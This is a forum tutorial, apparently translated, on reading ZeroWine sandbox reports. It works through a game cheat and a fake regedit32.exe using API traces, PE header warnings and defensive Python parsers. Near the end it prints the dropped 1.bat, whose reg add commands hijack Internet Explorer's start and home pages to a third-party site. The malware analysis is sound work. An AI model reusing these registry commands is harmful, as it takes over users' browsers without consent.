Explaining ZeroWine reports with worked examples
This post was last edited by roxiel on 2009-12-29 18:36.
First, let's look at the layout of the report page.
The top half of the page: if the uploaded program spawned several child processes, a warning is shown here.
==========================================================================
Next, let's start with Strings: the string information that can be read directly from the file, similar to what BinText does.
==========================================================================
Then the File Header.
Besides the signature, it mainly contains:
DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER
PE Sections
Directories
Imported symbols
and so on. It is very thorough; it even computes an MD5 and a SHA hash for every section.
It also tells you, under Signature, which sections look problematic.
==========================================================================
Next, look at Signature. The figure below shows only one malicious trait: the program creates a pipe, which backdoors often do.
==========================================================================
Finally, let's look at the Report.
Heh, it is very detailed: we can find the APIs behind the suspicious behaviour, and sometimes there is also a list of the processes running at the time.
Below is a report from a failed analysis; I suggest changing the timeout from 10 to 9999999.
The figure below should look familiar... SLEEP. Generally, once you see this, you already know the program is up to no good~~~~
============================== Note: example 1 starts here ==============================
I picked a game cheat (外挂).
First, the returned web page.
Then the Signature:
trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
// This is why I said earlier that it checks for SICE (the SoftICE debugger devices)
0009:Call advapi32.RegOpenKeyExW(80000002,7eafd840 L"Software\\Microsoft\\Windows NT\\CurrentVersion",00000000,00000001,0032f144) ret=7eae4a62
0009:Call advapi32.RegOpenKeyExW(00000044,7eafd93c L"Drivers32",00000000,00000001,0032f140) ret=7eae4b49
trace:file:CreateFileW L"C:\\windows\\SYSTEM.INI" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
0009:Call advapi32.RegOpenKeyExW(80000002,7eab9040 L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32",00000000,00000001,0032d87c) ret=7eab29f8
trace:file:CreateFileW L"C:\\windows\\system.ini" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
0009:Call advapi32.RegCreateKeyW(80000002,008f0190 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032d02c) ret=7eab249e
0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc
0009:Call advapi32.RegCreateKeyExW(00000048,7ee7bf40 L"Temporary System Parameters",00000000,00000000,00000001,000f003f,00000000,7eea6690,00000000) ret=7ee438b5
0009:Call advapi32.RegCreateKeyW(80000002,008f01c8 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032fb98) ret=7eab2018
0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057
0009:Call advapi32.RegSetValueExA(0000003c,7eab957a "cFilterTags",00000000,00000004,008f0138,00000004) ret=7eab2096
0009:Call advapi32.RegSetValueExA(0000003c,7eab9586 "fdwSupport",00000000,00000004,008f0140,00000004) ret=7eab20d1
0009:Call advapi32.RegSetValueExA(0000003c,7eab9591 "aFormatTagCache",00000000,00000003,008f01b0,00000008) ret=7eab2164
Then the File Header:
This shows that it has another file bundled inside it.
I won't go through the final REPORT; it contains both the behaviour of the uploaded program and ZeroWine's own working behaviour, and if you read it carefully you can deepen your understanding of how ZeroWine works.
In short, from the SIG and the HEADER alone we can already conclude that this is not a normal program.
============================== Note: example 2 starts here ==============================
A fake regedit32.exe.
Look at the Signature:
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 3 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READcreation 2 attributes 0x80
0009:Call KERNEL32.CreateProcessA(00000000,00122088 "\"C:\\windows\\1.bat\"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33
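The two Signature traces above (the SoftICE device opens in example 1, and the dropped 1.bat launched through CreateProcessA in example 2) can be turned into automatic findings by parsing the Wine trace lines. The Python below is an added example, not ZeroWine's own code: it parses the `trace:file:CreateFileW` and `NNNN:Call ...` line shapes quoted in this post, and the finding names (anti_debug_softice, dropped_file_executed, and so on) are my own labels, not ZeroWine's. The sample input is the set of trace lines quoted above.

```python
import re
from collections import defaultdict

# Line shapes found in a ZeroWine (Wine +file/+relay) trace
CREATEFILE_RE = re.compile(
    r'^trace:file:CreateFileW L"((?:[^"\\]|\\.)*)"\s+(.*?)creation (\d+)')
CALL_RE = re.compile(r'^[0-9a-f]+:Call ([\w.]+)\((.*)\) ret=[0-9a-f]+$')
STRING_ARG_RE = re.compile(r'L?"((?:[^"\\]|\\.)*)"')

# Device names exposed by the SoftICE debugger; opening them is a
# debugger-presence check, which is what the report flags as "SICE"
SOFTICE_DEVICES = {r"\\.\sice", r"\\.\siwvid", r"\\.\ntice"}

# dwCreationDisposition values of CreateFile that create a new file
CREATE_NEW, CREATE_ALWAYS = 1, 2
REGISTRY_WRITERS = ("RegSetValueEx", "RegCreateKey")


def unescape(s):
    # Undo Wine's debugstr escaping: a doubled backslash becomes one, '\"' becomes '"'
    return re.sub(r'\\(.)', r'\1', s)


def exe_from_cmdline(cmd):
    """Return the program path at the start of a command line (quoted or not)."""
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(None, 1)[0]


def parse_line(line):
    """Turn one trace line into an event dict, or None for lines we ignore."""
    m = CREATEFILE_RE.match(line)
    if m:
        path, access, disposition = m.groups()
        return {"kind": "CreateFileW", "path": unescape(path),
                "access": access.split(), "disposition": int(disposition)}
    m = CALL_RE.match(line)
    if m:
        func, args = m.groups()
        return {"kind": "Call", "func": func.split(".")[-1],
                "strings": [unescape(s) for s in STRING_ARG_RE.findall(args)]}
    return None


def analyse(lines):
    """Derive signature-style findings from a sequence of trace lines."""
    findings = defaultdict(list)

    def add(name, value):
        if value not in findings[name]:
            findings[name].append(value)

    created = set()  # lower-cased paths the sample created with write access
    for event in filter(None, map(parse_line, lines)):
        if event["kind"] == "CreateFileW":
            path = event["path"]
            if path.lower() in SOFTICE_DEVICES:
                add("anti_debug_softice", path)
            if "GENERIC_WRITE" in event["access"] and \
                    event["disposition"] in (CREATE_NEW, CREATE_ALWAYS):
                created.add(path.lower())
                add("file_created", path)
        else:
            func, strings = event["func"], event["strings"]
            if func.startswith("CreateProcess") and strings:
                add("process_created", strings[0])
                exe = exe_from_cmdline(strings[0])
                if exe.lower() in created:      # a file it just wrote is now run
                    add("dropped_file_executed", exe)
            elif func.startswith(REGISTRY_WRITERS) and strings:
                add("registry_write", strings[0])
    return dict(findings)


# Trace lines quoted in this post (example 1 and example 2)
SAMPLE_TRACE = [
    r'trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80',
    r'trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80',
    r'trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80',
    r'0009:Call advapi32.RegCreateKeyW(80000002,008f0190 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032d02c) ret=7eab249e',
    r'0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc',
    r'0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057',
    r'trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 3 attributes 0x80',
    r'trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 1 attributes 0x80',
    r'trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITEcreation 1 attributes 0x80',
    r'trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READcreation 2 attributes 0x80',
    r'0009:Call KERNEL32.CreateProcessA(00000000,00122088 "\"C:\\windows\\1.bat\"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33',
]

if __name__ == "__main__":
    for name, values in analyse(SAMPLE_TRACE).items():
        print(name)
        for value in values:
            print("   ", value)
```

The "dropped file executed" finding is the one worth keeping: a CreateFileW with GENERIC_WRITE and CREATE_NEW/CREATE_ALWAYS followed by a CreateProcess of the same path is the pattern of the fake regedit32.exe in example 2, while the SoftICE device opens alone only say that the program dislikes being debugged.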
Then the HEADER:
----------Signature----------
UPX 2.90 -> Markus Oberhumer, Laszlo Molnar & John Reiser
----------Parsing Warnings----------
Suspicious flags set for section 0. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
Suspicious flags set for section 1. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
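The "Parsing Warnings" above come from checking each section's Characteristics field for IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE set together, and the per-section MD5/SHA values mentioned earlier are hashes of each section's raw bytes. The Python below is an added example, not ZeroWine's or pefile's code: a minimal PE section-table parser that reproduces both checks. It runs on a constructed in-memory PE image with UPX-style section names (build_sample_pe is made up for the demonstration and is not a real sample).

```python
import hashlib
import struct

# Section Characteristics bits from the PE specification
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes)
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")


def parse_sections(data):
    """Walk DOS header -> NT headers -> section table; hash each section's raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsections):
        (name, vsize, va, raw_size, raw_ptr,
         _, _, _, _, chars) = SECTION_HDR.unpack_from(data, table + i * SECTION_HDR.size)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "index": i,
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "md5": hashlib.md5(raw).hexdigest(),
            "sha1": hashlib.sha1(raw).hexdigest(),
        })
    return sections


def parsing_warnings(sections):
    """Reproduce the W+X check behind the report's 'Parsing Warnings'."""
    both = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [
        f"Suspicious flags set for section {s['index']}. Both IMAGE_SCN_MEM_WRITE "
        f"and IMAGE_SCN_MEM_EXECUTE are set. This might indicate a packed executable."
        for s in sections if (s["characteristics"] & both) == both
    ]


def build_sample_pe():
    """Constructed minimal PE image for the demo (not a real program or sample)."""
    e_lfanew, opt_size = 0x40, 224
    upx1_data = b"\xcc" * 64    # placeholder bytes standing in for packed code
    rsrc_data = b"\x00" * 32
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, 3 sections, SizeOfOptionalHeader, Characteristics=EXECUTABLE|32BIT
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    table = (
        SECTION_HDR.pack(b"UPX0", 0x10000, 0x1000, 0, 0, 0, 0, 0, 0, wx)
        + SECTION_HDR.pack(b"UPX1", 0x1000, 0x11000, len(upx1_data), 0x200, 0, 0, 0, 0, wx)
        + SECTION_HDR.pack(b".rsrc", 0x1000, 0x12000, len(rsrc_data), 0x400, 0, 0, 0, 0,
                           IMAGE_SCN_MEM_READ)
    )
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + table
    return headers.ljust(0x200, b"\0") + upx1_data.ljust(0x200, b"\0") + rsrc_data


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['index']} {s['name']:8s} chars=0x{s['characteristics']:08x} "
              f"md5={s['md5']} sha1={s['sha1']}")
    for warning in parsing_warnings(secs):
        print(warning)
```

Note that UPX0 has a raw size of 0 (it is only reserved in memory for the unpacked code), so its hashes are those of the empty string; a report that lists identical hashes for an empty section is therefore not a bug in the tool.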
As usual, I won't go through the REPORT.
Here is the 1.bat that it drops:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: temp
@rem Icon: D:\Program Files\ExeScript\regedit.ico
@rem OutputFile: C:\Documents and Settings\Administrator\
\regedit32.exe
@rem ----- ExeScript Options End -----
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe www.365wz.net/?15" /f
So it is also well worth preparing a VMware VM with a shadow-mode sandbox; in the next lesson we will cover how to obtain the files a virus generates.
Too deep for me, I don't understand any of it.......
Ugh. If even you can't understand it, what are the rest of us supposed to do?
3# innovation
Please start from the beginning; this is a series of articles~~~
Besides, the one above you is just putting it on...
I really can't understand it.
Yep, I can't understand it either.
Even if you don't understand it, you still have to read it; a very good method.
This thing has been sitting idle on my machine for ages; I had forgotten about it.
Could you explain it in more detail?